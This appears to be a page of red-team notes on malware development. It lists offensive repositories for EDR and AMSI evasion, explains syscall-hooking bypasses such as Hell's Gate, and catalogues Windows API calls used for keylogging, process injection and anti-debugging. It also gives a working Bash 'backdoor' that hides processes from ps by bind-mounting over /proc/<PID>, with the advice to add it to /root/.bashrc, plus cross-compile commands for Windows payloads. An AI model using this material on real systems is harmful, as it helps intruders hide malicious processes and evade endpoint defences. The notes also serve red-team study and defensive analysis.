- Bash Backdoor
- Endpoint Protection & Response (EDR)
- Microsoft Windows API
- PE Files
- x86_64-w64-mingw32-g++
- x86_64-w64-mingw32-gcc
- xxd
| Name | Description | URL |
|---|---|---|
| AmsiScanBufferBypass | Bypass AMSI by patching AmsiScanBuffer | https://github.com/rasta-mouse/AmsiScanBufferBypass |
| ASM HalosGate Direct System Caller | x64 Assembly HalosGate direct System Caller to evade EDR UserLand hooks | https://github.com/boku7/AsmHalosGate |
| BouncyGate | HellsGate in Nim, but making sure that all syscalls go through NTDLL.DLL (as in RecycledGate). | https://github.com/eversinc33/BouncyGate |
| FreshyCalls: Syscalls Freshly Squeezed! | FreshyCalls tries to make the use of syscalls comfortable and simple, without generating too much boilerplate and in modern C++17! | https://github.com/crummie5/FreshyCalls |
| GoRedOps | 🦫 GoRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team, with a specific focus on the Go programming language, all is made for educational purpoeses only. | https://github.com/EvilBytecode/GoRedOps |
| Hell's Gate | Original C Implementation of the Hell's Gate VX Technique | https://github.com/am0nsec/HellsGate |
| HellsHall - Another Way To Fetch Clean Syscalls | Performing Indirect Clean Syscalls | https://github.com/Maldev-Academy/HellHall |
| Linux syscall tables | n/a | https://syscalls.mebeim.net/?table=x86/64/x64/v6.2 |
| litcrypt | The name is an abbreviation of ‘Literal Encryption’ – a Rust compiler plugin to encrypt text literals using the XOR cipher. | https://docs.rs/litcrypt/latest/litcrypt |
| Maldev | Golang library for malware development and red teamers | https://github.com/D3Ext/maldev |
| Microsoft Windows System Call Table (XP/2003/Vista/2008/7/2012/8/10) | n/a | https://j00ru.vexillium.org/syscalls/nt/64/?s=09 |
| MutationGate | Use hardware breakpoint to dynamically change SSN in run-time | https://github.com/senzee1984/MutationGate |
| NimHollow | Nim implementation of Process Hollowing using syscalls (PoC) | https://github.com/xdavidel/NimHollow |
| NimlineWhisperer2 | A tool for converting SysWhispers2 syscalls for use with Nim projects | https://github.com/ajpc500/NimlineWhispers2 |
| nim-strenc | A tiny library to automatically encrypt string literals in Nim code | https://github.com/Yardanico/nim-strenc |
| OffensiveCpp | This repo contains C/C++ snippets that can be handy in specific offensive scenarios. | https://github.com/lsecqt/OffensiveCpp |
| Offensive-C-Sharp | I wrote these while learning AD Pentesting and windows hacking | https://github.com/winsecurity/Offensive-C-Sharp |
| OffensiveCSharp | Collection of Offensive C# Tooling | https://github.com/matterpreter/OffensiveCSharp |
| OffensiveGo | Golang weaponization for red teamers. | https://github.com/Enelg52/OffensiveGo |
| OffensiveLua | Offensive Lua is a collection of offensive security scripts written in Lua with FFI. | https://github.com/hackerhouse-opensource/OffensiveLua |
| OffensiveNim | Experiments in weaponizing Nim for implant development and general offensive operations. | https://github.com/0xsyr0/OffensiveNim |
| OffensiveRust | Rust Weaponization for Red Team Engagements. | https://github.com/trickster0/OffensiveRust |
| ParallelSyscalls | Companion code to the "EDR Parallel-asis through Analysis" found: https://www.mdsec.co.uk/2022/01/edr-parallel-asis-through-analysis | https://github.com/mdsecactivebreach/ParallelSyscalls |
| PoolParty | A set of fully-undetectable process injection techniques abusing Windows Thread Pools | https://github.com/SafeBreach-Labs/PoolParty |
| RecycledGate | Hellsgate + Halosgate/Tartarosgate. Ensures that all systemcalls go through ntdll.dll | https://github.com/thefLink/RecycledGate |
| RustRedOps | 🦀 RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team, with a specific focus on the Rust programming language. (In Construction) | https://github.com/joaoviictorti/RustRedOps |
| Ruy-Lopez | This repository contains the Proof-of-Concept(PoC) for a new approach to completely prevent DLLs from being loaded into a newly spawned process. | https://github.com/S3cur3Th1sSh1t/Ruy-Lopez |
| SysWhispers | AV/EDR evasion via direct system calls. | https://github.com/jthuraisamy/SysWhispers |
| SysWhispers2 | AV/EDR evasion via direct system calls. | https://github.com/jthuraisamy/SysWhispers2 |
| SysWhispers3 | SysWhispers on Steroids - AV/EDR evasion via direct system calls. | https://github.com/klezVirus/SysWhispers3 |
| Tartarus' Gate - Bypassing EDRs | TartarusGate, Bypassing EDRs | https://github.com/trickster0/TartarusGate |
| Tartarus-TpAllocInject | This is a simple loader that was published along with the blog post for Nettitude Labs on "Creating an OPSEC safe loader for Red Team Operations". | https://github.com/nettitude/Tartarus-TpAllocInject |
| Win32 Offensive Cheatsheet | Win32 and Kernel abusing techniques for pentesters | https://github.com/matthieu-hackwitharts/Win32_Offensive_Cheatsheet |
| Windows API Function Cheatsheets | A reference of Windows API function calls, including functions for file operations, process management, memory management, thread management, dynamic-link library (DLL) management, synchronization, interprocess communication, Unicode string manipulation, error handling, Winsock networking operations, and registry operations. | https://github.com/7etsuo/windows-api-function-cheatsheets |
This is an old Linux trick executed in Bash that simply over-mounts a particular PID in /proc with a useless, empty directory, so that /proc/<PID> doesn't get populated with the usual process information (invisible to the ps command, for example).
Requires root permissions; either execute it in your shell or slap it into /root/.bashrc.
Thanks to Alh4zr3d and THC for sharing!
hide()
{
[[ -L /etc/mtab ]] && { cp /etc/mtab /etc/mtab.bak; mv /etc/mtab.bak /etc/mtab; }
_pid=${1:-$$}
[[ $_pid =~ ^[0-9]+$ ]] && { mount -n --bind /dev/shm /proc/$_pid && echo "[Backdoor] PID $_pid is now hidden"; return; }
local _argstr
for _x in "${@:2}"; do _argstr+=" '${_x//\'/\'\"\'\"\'}'"; done
[[ $(bash -c "ps -o stat= -p \$\$") =~ \+ ]] || exec bash -c "mount -n --bind /dev/shm /proc/\$\$; exec \"$1\" $_argstr"
bash -c "mount -n --bind /dev/shm /proc/\$\$; exec \"$1\" $_argstr"
}- Hide the current shell/PID:
hide - Hide process with pid 31337:
hide 31337 - Hide
sleep 1234: hide sleep 1234 - Start and hide
sleep 1234as a background process:hide nohup sleep 1234 &>/dev/null &
Kernel
^ (Syscall)
|
ntdll.dll < Monitored by EDR
^ (NtAllocateVirtualMemoryEx)
|
Win32 API
(System32 DLLs)
^ (VirtualAllocEx)
|
Written CodeBasically the EDR replaces the call instruction of the syscall with a jump instruction to the EDR process.
The Hells Gate Technique requires to read the ntdll.dll from disk, because the ntdll.dll in memory, is hooked by the EDR.
- GetAsyncKeyState
- GetKeyState
- SetWindowsHookExA
- WSAStartup
- WSASocket
- WSACleanup
- socket
- bind
- WSAIoctl
- ioctlsocket()
- URLDownloadToFile
- ShellExecute
- WinExec
- InternetOpen
- InternetConnect
- HttpOpenRequest
- HttpAddRequestHeaders
- HTTPSendRequest
- InternetReadFile
- FindResource
- LoadResource
- SizeOfResource
- LockResource
- LoadLibraryA
- GetProcAddress
- GetWindowsThreadProcessId
- SetWindowsHookEx
- BroadcastSystemMessage
- GetMessage
- DispatchMessage
- OpenProcess
- VirtualAllocEx
- WriteProcessMemory
- GetModuleHandle
- GetProcAddress
- CreateRemoteThread
- LoadLibraryA
- GetProcAddress
- VirtualProtect
- ReadProcessMemory
- CreateProcessA
- NtUnmapViewOfSection
- VirtualAllocEx
- WriteProcessMemory
- GetTickCount
- CountClipboardFormats
- GetForeGroundWindow
- IsDebuggerPresent
- CreateToolhelp32Snapshot
- CheckRemoteDebuggerPresent
- NtQueryInformationProcess
- ZwQueryInformationProcess
- NtSetInformationThread
- ZwSetInformationThread
- NtQueryObject
- OutputDebugString
- EventPairHandles
- CsrGetProcessID
- CloseHandle
- NtClose
- IsDebugged Flag
- Heap Flag
- FindFirstStreamW
- FindNextStreamW
- CryptCreateHash
- CryptEncrypt
- CryptDecrypt
- CryptGenKey
- CryptDeriveKey
- CryptAcquireContext
Algid indicates used algorithm. (0x000066xx)
- RtlCompressBuffer
- RtlDecompressBuffer
- CryptAcquireContext
- CryptCreateHash
- BCryptCreateHash
- CryptEncrypt/Decrypt
- Process32First
- FindWindowsA
- RegSetValueEx
- CreateThread
- GetEIP
- GetFileSize
- malloc
- free
- GetTempPathA
- WinExec
- GetModuleHandleA
- ResumeThread
- NtAllocateVirtualMemory
- NtOpenProcess
- ZwWriteVirtualMemory
- ZwResumeThread
- NtOpenEvent
- NtCreateEvent
- NtCreateUserProcess
- AdjustTokenPrivileges
- CreateFileMapping
- CreateMutex
- FindResource
- GetModuleFilename
- LdrLoadDll
- .text: This Section generally contains the CPU instructions executed when the PE file is run. This section is marked as executable.
- .data: This Section contains the global variables and other global data used by the PE file.
- .rsrc: This Section contains resources that are used by the PE file, for example, images, icons, etc.
$ x86_64-w64-mingw32-g++ -O2 <FILE>.cpp -o <FILE>.exe -mconsole -I /usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive >/dev/null 2>&1$ x86_64-w64-mingw32-gcc <FILE>.c -o <FILE>.exe$ xxd -i <FILE>